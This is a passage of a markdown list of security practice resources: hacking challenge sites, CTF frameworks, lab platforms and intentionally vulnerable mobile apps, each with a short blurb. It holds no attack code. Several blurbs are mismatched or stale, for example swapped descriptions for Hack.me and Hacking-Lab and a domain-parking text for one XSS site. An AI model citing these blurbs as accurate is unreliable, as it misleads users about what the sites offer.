- [Forensic Practical](http://www.forensickb.com/2008/01/forensic-practical.html) - To hone your forensic skills and run malware found on the honeypots by installing it on clean computer systems and watch its behavior
- [Gh0st Lab](http://www.gh0st.net/) - The original idea of this network was to create a security research network where like minded individuals could work together towards the common goal of knowledge
- <b>[Hack The Box](https://www.hackthebox.eu)</b> - An online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field
- <b>[TryHackMe](https://tryhackme.com/)</b> - Cyber Security training made easy. A comfortable experience to learn by designing prebuilt courses which include virtual machines (VM) hosted in the cloud ready to be deployed
- [Hack This Site](http://www.hackthissite.org/) - Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills
- [HackThis](http://www.hackthis.co.uk/) - Defend the Web is an Interactive Cyber Security Platform
- [HackQuest](http://www.hackquest.com/) - Anonymous Webhosting, Virtual Servers, Secure Email
- [Hack.me](https://hack.me) - Hacking-Lab is a service by Security Competence GmbH, a Swiss subsidiary of Compass Security AG.
Compass Security is a well renowned European company specializing in penetration testing, incident response, digital forensics, and security trainings
- [Hacking-Lab](https://www.hacking-lab.com) - Hack.me is a FREE, community based project powered by eLearnSecurity. The community can build, host and share vulnerable web application code for educational and research purposes
- [Hacker Test](http://www.hackertest.net/) - HackerTest.net is your own online hacker simulation. This new real-life imitation will help you advance your security knowledge of JavaScript, PHP, HTML and graphic thinking
- [Halls Of Valhalla](http://halls-of-valhalla.org/beta/challenges) - Valhalla is a place for sharing knowledge and ideas. Users can submit code, as well as science, technology, and engineering-oriented news and articles
- [Hax.Tor](http://hax.tor.hu/) - HaX.ToR.Hu is a challenge site putting emphasis on teaching basic security related issues in a fun way
- [Metasploit Unleashed ](https://www.offensive-security.com/metasploit-unleashed/) - The Metasploit Unleashed (MSFU) course is provided free of charge by Offensive Security in order to raise awareness for underprivileged children in East Africa
- [OverTheWire](http://www.overthewire.org/wargames/) - The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games
- [PentestIT](https://lab.pentestit.ru/) - Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills
- [CSC Play on Demand](https://pod.cybersecuritychallenge.org.uk/) - The aim of this challenge is to identify the means by which an insider may accidentally or maliciously leak organisational secrets via seemingly innocent files
- [Root Me](http://www.root-me.org/?lang=en) - The fast, easy, and affordable way to train your hacking skills
- [Security Treasure Hunt](http://www.securitytreasurehunt.com/) - A new Packet Capture-based Web Vulnerability Analysis challenge is available through April 30th, 2013, sponsored by Cyber Aces
- [Smash The Stack](http://www.smashthestack.org/) - Wargaming Network
- [SQLZoo](http://sqlzoo.net/hack/) - Exploiting an SQL Inject attack involves solving a puzzle that is a cross between Hangman and 20 Questions. It needs a little understanding of SQL and a great deal of cunning
- [TheBlackSheep and Erik](http://www.bright-shadows.net/) - Offers you hundreds of challenges in the fields of programming, JavaScript, PHP, Java, steganography, cryptography and others
- [ThisIsLegal](http://thisislegal.com/) - A hacker wargames site with much more such as forums and tutorials
- [Try2Hack](http://www.try2hack.nl/) - This site provides several security-oriented challenges for your entertainment. It is actually one of the oldest challenge sites still around
- [VulnHub](https://vulnhub.com/) - A collection of vulnerable hosts and associated challenges to gain 'hands-on' experience in cyber security.
- [XSS: Can You XSS This?](http://canyouxssthis.com/HTMLSanitizer/) - Use HTMLSanitizer to protect your Web Apps
- [XSS Game](https://xss-game.appspot.com/) - Learn to find and exploit XSS bugs
- [XSS: ProgPHP](http://xss.progphp.com/) - Next-Gen Domain Registration. Progphp.com is coming soon!
- [Pwnable.tw](http://pwnable.tw/) - A newer set of high quality pwnable challenges)
- [Pwnable.kr](http://pwnable.kr/) - One of the more popular recent wargamming sets of challenges
- [PicoCTF](https://picoctf.com/) - Designed for high school students while the event is usually new every year, it's left online and has a great difficulty progression
- [CTF Learn](http://ctflearn.com/) - A new CTF based learning platform with user-contributed challenges
- [Reversing.kr](http://reversing.kr/) - This site tests your ability to Cracking & Reverse Code Engineering
- [w3challs](https://w3challs.com/) - Our challenges address several subsets of hacking, mostly oriented on the offensive. A multitude of technologies and architectures are waiting for you. Show us your mad skillz and pop some shells (or calcs)!
- [RingZer0 Team](https://ringzer0team.com/) - RingZer0 Team's online CTF offers you tons of challenges designed to test and improve your hacking skills through hacking challenges.
- [HellBound Hackers](http://www.hellboundhackers.org/) -The hands-on approach to computer security and simulated security challenges
- [Komodo Consulting](http://ctf.komodosec.com) - Application Security Challenge designed to challenge your application hacking skills
- [Maxkersten Binary Analysis](https://maxkersten.nl/binary-analysis-course/) - A practical binary analysis course
- [PwnAdventure](https://pwnadventure.com) - Pwnie Island is a limited-release, first-person, true open-world MMORPG set on a beautiful island where anything could happen. That's because this game is intentionally vulnerable to all kinds of silly hacks! Flying, endless cash, and more are all one client change or network proxy away
- [INE](https://ine.com/) - Practical Hands-on Online IT Training and Certifications
## Labs
- [CTFd](https://github.com/isislab/CTFd) - CTFs as you need them
- [Mellivora](https://github.com/Nakiami/mellivora) - Mellivora is a CTF engine written in PHP
- [Metasploitable2 ](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) - Metasploitable is an intentionally vulnerable Linux virtual machine
- [NightShade](https://github.com/UnrealAkama/NightShade) - A simple capture the flag framework.
- [MCIR](https://github.com/SpiderLabs/MCIR) - The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds.
- [Vagrant](https://www.vagrantup.com/) - Development Environments Made Easy
- [NETinVM](https://informatica.uv.es/~carlos/docencia/netinvm/) - A tool for teaching and learning about systems, networks and security
- [SmartOS](https://smartos.org/) - SmartOS is a free and open-source SVR4 hypervisor based on the UNIX operating system that combines OpenSolaris technology with Linux's KVM virtualization.
- [SmartDataCenter](https://github.com/joyent/sdc) - Joyent Triton DataCenter: a cloud management platform with first class support for containers.
- [vSphere Hypervisor](https://www.vmware.com/products/vsphere-hypervisor/) - vSphere Hypervisor is a bare-metal hypervisor that virtualizes servers; allowing you to consolidate your applications while saving time and money managing your IT infrastructure.
- [GNS3](http://sourceforge.net/projects/gns-3/) - Build, Design and Test your network in a risk-free virtual environment and access the largest networking community to help.
- [OCCP](https://opencyberchallenge.net/) - A free, configurable, open-source virtualization platform for cyber security educators and challenge event coordinators.
- [XAMPP](https://www.apachefriends.org/index.html) - XAMPP is a completely free, easy to install Apache distribution containing MariaDB, PHP, and Perl. The XAMPP open source package has been set up to be incredibly easy to install and to use.
- [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) - The Kubernetes Goat designed to be intentionally vulnerable cluster environment to learn and practice Kubernetes security.
- [Offensive Security](https://www.offensive-security.com/labs/individual/) - Practice your pentesting skills in a standalone, private lab --environment with the additions of PG Play and PG Practice to Offensive Security’s Proving Grounds training labs.
- [Game of Hacks](http://www.gameofhacks.com/) - Alright, this one isn’t exactly a vulnerable web app – but it’s another engaging way of learning to spot application security vulnerabilities, so we thought we’d throw it in
- [Google Gruyere](https://google-gruyere.appspot.com/) - This ‘cheesy’ vulnerable site is full of holes and aimed for those just starting to learn application security.
- [Hellbound Hackers](https://www.hellboundhackers.org/) - Hellbound Hackers, the hands-on approach to computer security, offers a wide array of challenges with the aim to teach how to identify exploits and suggest the code to patch it
- [Peruggia](https://sourceforge.net/projects/peruggia/) - Peruggia is a safe environment for security professionals and developers to learn and test common attacks on web applications.
- [oliverwiegers/pentest_lab](https://github.com/oliverwiegers/pentest_lab) - Local pentest lab leveraging Docker Compose.
- [Hacksplaining](https://www.hacksplaining.com/) - Interactive lessions for several well-known web vulnerabilities.
## Mobile Apps
- [Allsafe](https://github.com/t0thkr1s/allsafe) - Allsafe is an intentionally vulnerable application that contains various vulnerabilities.
- [Damn Vulnerable Android App (DVAA)](https://code.google.com/p/dvaa/) - Damn Vulnerable Android App (DVAA) is an Android application which contains intentional vulnerabilities
- [Damn Vulnerable FirefoxOS Application (DVFA)](https://github.com/arroway/dvfa) - Damn Vulnerable FirefoxOS Application - a purposefully vulnerable application for demontrastion
- [Damn Vulnerable iOS App (DVIA)](damnvulnerableiosapp.com/) - Damn Vulnerable iOS App (DVIA) is an iOS application that is damn vulnerable
- [ExploitMe Mobile Android Labs](https://securitycompass.github.io/AndroidLabs/) - The insecure Android app for your hacking pleasure
- [ExploitMe Mobile iPhone Labs](https://securitycompass.github.io/iPhoneLabs/) - A defective iPhone App for your hacking pleasure
- [Hacme Bank Android](https://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx) - Free McAfee tools to aid in your security protection.
- [InsecureBank](https://www.paladion.net/downloadapp.html) - Cyber Tales by Paladion
- [NcN Wargame](https://github.com/NocONName/Wargame_NcN2012) - No cON Name 2012 Challenges
- [OWASP iGoat](https://code.google.com/p/owasp-igoat/) - The OWASP iGoat project is a security learning tool for iOS developers to learn about security weaknesses in iOS -- by breaking things as well as fixing them.
- [OWASP Goatdroid](https://github.com/jackMannino/OWASP-GoatDroid-Project) - OWASP GoatDroid is a fully functional and self-contained training environment for educating developers and testers on Android security
- [OWASP MSTG Hacking Playground](https://github.com/OWASP/MSTG-Hacking-Playground) - A set of mobile vulnerable apps of which you can exploit the vulnerabilities using techniques of the OWASP MSTG.
- [OWASP MSTG Crackmes](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes) - A set of mobile apps that help you to improve your reverse engineering skills base don the [OWASP MSTG](https://github.com/OWASP/owasp-mstg).
Contributions are always appreciated
|